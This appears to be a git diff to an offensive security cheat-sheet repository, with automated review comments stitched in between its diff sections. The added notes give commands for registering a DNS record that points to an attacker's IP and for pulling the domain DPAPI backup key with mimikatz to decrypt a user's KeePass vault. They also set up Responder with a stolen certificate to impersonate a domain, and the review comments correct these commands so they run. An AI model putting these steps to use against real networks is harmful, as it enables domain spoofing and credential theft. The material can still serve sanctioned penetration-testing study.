diff --git a/.gitmodules b/.gitmodules
index d6dc447..02bcfee 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -181,3 +181,6 @@
 [submodule "misc/level3_hypervisor/kubeletctl"]
 path = misc/level3_hypervisor/kubeletctl
 url = https://github.com/cyberark/kubeletctl.git
+[submodule "misc/bruteforce/patator"]
+ path = misc/bruteforce/patator
+ url = https://github.com/lanjelot/patator.git
diff --git a/enumeration/docs/dns.md b/enumeration/docs/dns.md
index ed0c86b..0ed7fde 100644
--- a/enumeration/docs/dns.md
+++ b/enumeration/docs/dns.md
@@ -9,3 +9,17 @@ drill @$TARGET_DNS $DOMAIN axfr
 ```
 * [subrake](https://github.com/hash3liZer/Subrake.git)
+
+
+## Join a Domain
+
+* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
+```sh
+nsupdate
+server
+update delete
+update add 1234 A $ATTACKER_IP
+send
+quit
+```
+* Check domain by querying the subdomain's A record via dig/drill/nslookup
diff --git a/exploit/windows/docs/dpapi.md b/exploit/windows/docs/dpapi.md
new file mode 100644
index 0000000..8ea8716
--- /dev/null
+++ b/exploit/windows/docs/dpapi.md
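Review bot: The nsupdate block does not parse as written — nsupdate's syntax is `update add <name> <ttl> <type> <data>`, so in `update add 1234 A $ATTACKER_IP` the `1234` is taken as the owner name and `A` as the TTL, and `server` and `update delete` are likewise missing their host argument; angle-bracket placeholders were presumably lost when the page was rendered. The three lines should read `server $TARGET_DNS`, `update delete $HOST.$DOMAIN A` and `update add $HOST.$DOMAIN 1234 A $ATTACKER_IP`, reusing the variables the file already uses in the `drill` example above the hunk. The prose "needs cert and Pk" does not say which credential is meant: an AD zone configured for secure dynamic updates only accepts GSS-TSIG, i.e. `nsupdate -g` with a valid Kerberos ticket, whereas a zone allowing nonsecure updates needs nothing at all, and the sheet should say which case it covers. The heading "Join a Domain" also overstates what happens — this registers an attacker-controlled A record in the zone, it does not join a machine to the domain.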
@@ -0,0 +1,27 @@
+# DPAPI
+
+* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)
+* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)
+* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)
+* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)
+
+## Tools
+
+* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)
+* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)
+* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround
+Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
+ * Get the pvk backup key from the DC via mimikatz
+ * Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
+ * Get the encrypted blob
+ * Get the user's Masterkey under `C:\users\\AppData\Roaming\Microsoft\Protect\\`
+ * Use dpapilab-ng's `keepassdec.py`
+```sh
+./keepassdec.py --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk --entropy_hex= --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin
+```
+ * Use the decrypted blob to
+```sh
+CQDPAPIKeePassDBDecryptor.exe /k /f .kdbx
+```
+* Open the `*.kdbx` file
+
diff --git a/hashes/hashcat_utils.md b/hashes/hashcat_utils.md
index 96f02cc..66becd2 100644
--- a/hashes/hashcat_utils.md
+++ b/hashes/hashcat_utils.md
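Review bot: Several placeholders in the workaround steps are empty, so the commands cannot be run as printed: the masterkey path `C:\users\\AppData\Roaming\Microsoft\Protect\\` lacks the username and the SID/GUID components, `--entropy_hex=` has no value, and `CQDPAPIKeePassDBDecryptor.exe /k /f .kdbx` has neither a key nor a file name — the angle-bracket placeholders were presumably stripped when the page was rendered. Suggested forms are `C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>` and `CQDPAPIKeePassDBDecryptor.exe /k <decrypted-key> /f <database>.kdbx`, with the exact `/k` argument to be confirmed against the tool's usage text, and the hard-coded SID and `ntds_capi_*.pvk` GUID in the `keepassdec.py` line are better shown as `$SID` / `<guid>` so nobody copies them verbatim. The bullet "Use the decrypted blob to" is cut off and should say what the output of `keepassdec.py` is fed into (presumably the `/k` argument of the next command). Worth a one-line caveat next to the pvk step: that file is the domain-wide DPAPI backup key, which decrypts every domain user's masterkey, so it has to be stored and disposed of with the same care as the NTDS dump it came from. Minor spelling: "domian", "Pressuposition", "tjldeneut's dpaping-lab".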
@@ -4,3 +4,8 @@
 ```sh
 combinator wordlist.txt otherwordlist.txt > newwordlist.txt
 ```
+
+* Create wordlist
+```sh
+hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
+```
diff --git a/misc/bruteforce/patator b/misc/bruteforce/patator
new file mode 160000
index 0000000..4690822
--- /dev/null
+++ b/misc/bruteforce/patator
@@ -0,0 +1 @@
+Subproject commit 46908228cc85fbc032426a12d048fa372e213da4
diff --git a/misc/openssl/openssl.md b/misc/openssl/openssl.md
new file mode 100644
index 0000000..8970457
--- /dev/null
+++ b/misc/openssl/openssl.md
@@ -0,0 +1,17 @@
+# OpenSSL Cheatsheet
+
+## Extract keys from PFX Cert
+
+* Key and cert form PFX
+```sh
+openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
+openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
+```
+
+## Extract & Repack PFX Cert
+
+* Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
+```sh
+openssl pkcs12 -in *.pfx -out temp.pem -nodes
+openssl pkcs12 -export -out *.pfx -in temp.pem
+```
diff --git a/misc/responder.md b/misc/responder.md
new file mode 100644
index 0000000..ab4d130
--- /dev/null
+++ b/misc/responder.md
@@ -0,0 +1,21 @@
+# Responder
+
+## Impersonate Domain -- Change Responder's certificates
+
+* After using nsupdate to add the attacker as a subdomain do the following tasks
+* Add a certificate and its private key to
+```sh
+/usr/share/responder/certs
+```
+* Edit `Responder.conf`
+```
+[HTTPS Server]
+
+; Configure SSL Certificates to use
+SSLCert = certs/cert.pem
+SSLKey = certs/key.pem
+```
+* Start responder
+```sh
+responder -I
+```
diff --git a/osint/osint_links.txt b/osint/osint_links.txt
new file mode 100644
index 0000000..5a62e65
--- /dev/null
+++ b/osint/osint_links.txt
@@ -0,0 +1,9 @@
+https://urlscan.io/
+https://abuse.ch
+https://bazaar.abuse.ch/
+https://feodotracker.abuse.ch/
+https://sslbl.abuse.ch/
+https://urlhaus.abuse.ch/
+https://threatfox.abuse.ch/
+https://www.phishtool.com/
+https://talosintelligence.com/
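Review bot: The "Create wordlist" command `hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt` names no input wordlist, so hashcat reads candidates from stdin and simply blocks when run from a terminal; a placeholder was presumably dropped when the page was rendered. It should read `hashcat -r /opt/hashcat/rules/best64.rule --stdout base_wordlist.txt > wordlist.txt`, and the bullet is clearer as "Create wordlist by applying a rule file to an existing wordlist". `--force` only suppresses hashcat's backend/runtime warnings; if it is genuinely required on the author's setup, say why in the bullet, otherwise drop it so the warnings stay visible when the line is reused for a real cracking run.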
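Review bot: The repack commands use shell globs for both input and output — `openssl pkcs12 -in *.pfx -out temp.pem -nodes` and `openssl pkcs12 -export -out *.pfx -in temp.pem` — so with one matching file the second command overwrites the original PFX in place, and with more than one the glob expands to extra arguments and openssl errors out. Use explicit names, e.g. `openssl pkcs12 -in cert.pfx -out temp.pem -nodes` and `openssl pkcs12 -export -in temp.pem -out repacked.pfx`, matching the `cert.pfx` naming of the first section. Because `-nodes` writes the private key to `temp.pem` unencrypted, the sheet should tell the reader to remove it once the new PFX exists (`shred -u temp.pem`). The passwords the prose mentions (`mimikatz`, `cqure`) should be typed at openssl's interactive prompt rather than passed as `-passin pass:`/`-passout pass:` on the command line, where they end up in the process list and shell history.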
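Review bot: `responder -I` at the end of the hunk is missing its argument — `-I` takes an interface name — so the command fails as printed; the placeholder was presumably stripped when the page was rendered. The line should read `responder -I eth0`, or `responder -I $IFACE` to match the `$ATTACKER_IP`-style variables used in dns.md. It is also worth saying in the first bullet that the certificate placed in `/usr/share/responder/certs` must be issued for the exact name registered with nsupdate in the preceding step, otherwise clients get a name-mismatch warning instead of a trusted page, and that `certs/key.pem` (presumably stored without a passphrase, since Responder loads it non-interactively) should be readable only by the user running Responder.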